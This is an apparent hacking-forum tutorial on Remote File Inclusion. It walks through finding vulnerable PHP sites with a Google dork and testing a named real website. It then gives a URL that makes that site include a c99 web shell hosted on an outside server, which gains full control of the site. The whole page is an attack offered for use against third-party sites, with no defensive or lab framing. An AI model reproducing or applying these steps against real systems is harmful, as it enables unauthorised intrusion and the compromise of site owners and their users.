Main » Articles » Web Hacking » RFI

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) : It is a type of vulnerability most often found on websites in which, it allows the attacker to upload a custom coded/malicious file on a website or server using a script.

Tutorial:

1st Step : Find a Vulnerable websites using Google Dork. Copy the Dork in the Google

inurl:index.php?page= 

Step 2 :  This will show all the pages which has "index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion.

www.targetsite.com/index.php?page=http://www.Google.com

see example of this website http://www.cbspk.com

So the example URL will become:

www.cbspk.com/v2/index.php?page=http://www.google.com

Step 3 :  If after executing the command the homepage of the Google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Step 4 :  Now we would upload the shells to gain access. The most common shells used are c99 shell or GNY shell. I would use GNY shell. You can download C99 shell from the link below:

Download Shell

 Step 5 : First you have to upload the shells to a web hosting site such as  viralhosts.com,110mb.com or another free hosts etc.

Now here is how a hacker would execute the shells to gain access.

OR  you can direct access the shell , Lets say that the url of the shell is http://www.sh3ll.org/c99.txt?

Now We have to execute the following command to gain access

www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?

Don’t Forget To add Question Mark (?) after .txt at the end of url or else the shell will not execute. Now You are inside the website and you can do anything with it. :P

Category: RFI | Added by: max_hacker (12.07.26)
Views: 4869 | Comments: 1415 | Rating: 2.5/2
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
Recommend on Google

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2024
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz